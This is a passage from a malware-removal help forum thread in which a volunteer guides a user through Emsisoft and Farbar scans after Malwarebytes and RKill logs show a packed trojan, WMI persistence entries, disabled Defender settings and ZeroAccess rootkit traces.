Trojan.MalPack.UPX, C:\$RECYCLE.BIN\S-1-5-21-1250379553-2428740185-3603661230-500\$RH37WJP.EXE, No Action By User, 7156, 858908, 1.0.52976, EF5058CCC8725A5C802E0BD8, dds, 01703524, A4FDD182C052C420520377E94442376D, 8B7963CB577113F618ED39F5D2F13BBDC34A5000B454B3FEA6082F0C828EE683


Physical Sector: 0
(No malicious items detected)

WMI: 3
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"", No Action By User, 15644, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__EventFilter.Name="killmm3", No Action By User, 15644, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:CommandLineEventConsumer.Name="killmm4", No Action By User, 15644, 868677, 1.0.52976, , ame, , ,



(end)


Edited by Ztruker, 28 March 2022 - 08:48 PM.

Rich
 

Die with memories, not dreams. – Unknown


#13 Juliet

Juliet

    SuperHelper

  • Retired Classroom Teacher
  • 7,686 posts
  • Interests:Boo!....
  • MVP

Posted 29 March 2022 - 06:00 AM

Looks like we're slowly chipping away at it.
 
Next time you run MalwareBytes, enable the rootkit scanning too.
 
~~~~~~~

Please download Emsisoft Emergency Kit and save it to your desktop.

  • Double-click on EmsisoftEmergencyKit.exe to install and create a shortcut on the desktop.
  • Leave all settings as they are and click Accept & Extract. A folder named EEK will be created in the root of the drive (usually C:\) as shown here.
  • After extraction an Emsisoft Emergency Kit window will open. Under "Run Directly:" click Emergency Kit Scanner.
    rxYDlQ1.png
    .
  • When asked to run an online update, click Yes.
    dQaKPnk.png
    .
  • When the update is finished, click the Back to Security Status link in the left corner.
  • On the main screen click the Scan PC button.
  • Select Smart Scan, then click the Scan button.
  • When the scan is finished, click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
    g5ojhHp.png
    .
  • Click the View Report button and in the Reports window double-click on the most recent log. Logs are named as follows: a2scan_Date-Time.txt (YYMODY) and saved to C:\EEK\bin\Reports\.
  • Alternatively you can click Export and save the log to your Desktop, then open by double-clicking on it.
  • Copy and paste the contents of that logfile in your next reply.
  • ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

    We need a fresh scan with Farbar
  • Right-Click FRST.exe / FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply.
  • (Scan times will vary from one system to another. Sometimes the scan may appear to hang and you may even see a message that says, Program not responding. Most likely that will be temporary and the scan will resume on its own. It is not unusual for a complete scan to take up to10 minutes or even longer depending on what the scan is finding.)


Sometimes the angels fly close enough to you that you can hear the flutter of their wings...


MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??

#14 Juliet

Juliet

    SuperHelper

  • Retired Classroom Teacher
  • 7,686 posts
  • Interests:Boo!....
  • MVP

Posted 29 March 2022 - 06:30 AM

If you need to download a tool again

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 6 different versions. If one of them won't run then download and try to run the other one.
Vista and Win7 users need to right click and choose Run as Admin
You only need to get one of them to run, not all of them.Don't reboot the computer or it will disable and the infection will run again.
If you can, be where you need to be then start the download after running RKill.
Sometimes the angels fly close enough to you that you can hear the flutter of their wings...


MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??

#15 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 29 March 2022 - 09:17 AM

Had to run rkill.com to allow Emisoft to run, but then I got this error messsage:

 

emisoft-error.JPG

 

Is there an older version available 

 

Rkill log had this in it:

 

Rkill 2.9.1 by Lawrence Abrams (Grinler)
Copyright 2008-2022 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 03/29/2022 11:03:56 AM in x64 mode.
Windows Version: Windows 7 Home Premium Service Pack 1
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * c:\windows\temp\conhoy.exe (PID: 1688) [WD-HEUR]
 * c:\windows\temp\conhoy.exe (PID: 2396) [WD-HEUR]
 * c:\windows\inf\aspnet\lsma22.exe (PID: 2460) [WD-HEUR]
 
3 proccesses terminated!
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
 * Windows Defender Disabled
 
   [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001
 
 * ALERT: ZEROACCESS rootkit symptoms found!
 
     * C:\Windows\Installer\{02815385-b3dc-aa2c-a083-2e509dc82d52}\ [ZA Dir]
     * C:\Windows\Installer\{02815385-b3dc-aa2c-a083-2e509dc82d52}\L\ [ZA Dir]
     * C:\Windows\Installer\{02815385-b3dc-aa2c-a083-2e509dc82d52}\L\201d3dde [ZA File]
     * C:\Windows\Installer\{02815385-b3dc-aa2c-a083-2e509dc82d52}\U\ [ZA Dir]
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * HOSTS file entries found: 
 
  127.0.0.1 kr1s.ru
  127.0.0.1 zcop.ru
  127.0.0.1 sql.4i7i.com
 
Program finished at: 03/29/2022 11:07:58 AM
Execution time: 0 hours(s), 4 minute(s), and 1 seconds(s)
==============================================================
 
Do you want me to run Farbar again now?

Edited by Ztruker, 29 March 2022 - 09:19 AM.

Rich
 

Die with memories, not dreams. – Unknown

Related Topics



1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users